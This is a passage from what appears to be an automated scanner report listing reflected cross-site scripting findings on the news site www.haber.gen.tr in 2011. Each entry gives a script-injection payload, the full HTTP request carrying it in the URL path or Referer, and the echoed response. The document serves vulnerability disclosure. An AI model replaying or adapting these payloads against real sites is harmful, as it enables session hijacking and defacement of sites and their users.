User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:57 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openxb7ab3"><script>alert(1)</script>471d70f85ea/www/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type
...[SNIP]...

4.114. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd78"><script>alert(1)</script>5b16b6a2009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www5dd78"><script>alert(1)</script>5b16b6a2009/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:02 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www5dd78"><script>alert(1)</script>5b16b6a2009/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hi
...[SNIP]...

4.115. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee416"><script>alert(1)</script>a1aafb63781 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/deliveryee416"><script>alert(1)</script>a1aafb63781/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:12 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/deliveryee416"><script>alert(1)</script>a1aafb63781/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hidden" />
...[SNIP]...

4.116. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d3b"><script>alert(1)</script>df421e28eab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery/ajs.php94d3b"><script>alert(1)</script>df421e28eab?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:16 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery/ajs.php94d3b"><script>alert(1)</script>df421e28eab?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hidden" />
...[SNIP]...

4.117. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51e2"><script>alert(1)</script>c2c4fe2a9a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openxf51e2"><script>alert(1)</script>c2c4fe2a9a2/www/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:29 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openxf51e2"><script>alert(1)</script>c2c4fe2a9a2/www/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2
...[SNIP]...

4.118. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28677"><script>alert(1)</script>d4080b8fe97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www28677"><script>alert(1)</script>d4080b8fe97/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:33 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www28677"><script>alert(1)</script>d4080b8fe97/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2F
...[SNIP]...

4.119. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cdf2"><script>alert(1)</script>cdc8a4f2b76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery3cdf2"><script>alert(1)</script>cdc8a4f2b76/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:42 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery3cdf2"><script>alert(1)</script>cdc8a4f2b76/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fsh
...[SNIP]...

4.120. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e317"><script>alert(1)</script>d1da29fd1e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery/lg.php5e317"><script>alert(1)</script>d1da29fd1e0?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:48 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery/lg.php5e317"><script>alert(1)</script>d1da29fd1e0?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40
...[SNIP]...

4.121. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22431"><script>alert(1)</script>39b00191ec0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src22431"><script>alert(1)</script>39b00191ec0/languages/tr/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:45 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src22431"><script>alert(1)</script>39b00191ec0/languages/tr/messages.js" type="hidden" />
...[SNIP]...

4.122. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92e21"><script>alert(1)</script>f034d66f85a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages92e21"><script>alert(1)</script>f034d66f85a/tr/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:53 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages92e21"><script>alert(1)</script>f034d66f85a/tr/messages.js" type="hidden" />
...[SNIP]...

4.123. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b62b0"><script>alert(1)</script>d0f3b71f96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages/trb62b0"><script>alert(1)</script>d0f3b71f96/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages/trb62b0"><script>alert(1)</script>d0f3b71f96/messages.js" type="hidden" />
...[SNIP]...

4.124. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88615"><script>alert(1)</script>175578b2d1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages/tr/messages.js88615"><script>alert(1)</script>175578b2d1c HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:16 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages/tr/messages.js88615"><script>alert(1)</script>175578b2d1c" type="hidden" />
...[SNIP]...

4.125. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71af9"><script>alert(1)</script>54fe96e1c71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src71af9"><script>alert(1)</script>54fe96e1c71/scripts/tools.js?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:52 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src71af9"><script>alert(1)</script>54fe96e1c71/scripts/tools.js?nocache=2" type="hidden" />
...[SNIP]...

4.126. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29665"><script>alert(1)</script>4685965d83d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/scripts29665"><script>alert(1)</script>4685965d83d/tools.js?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:58 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
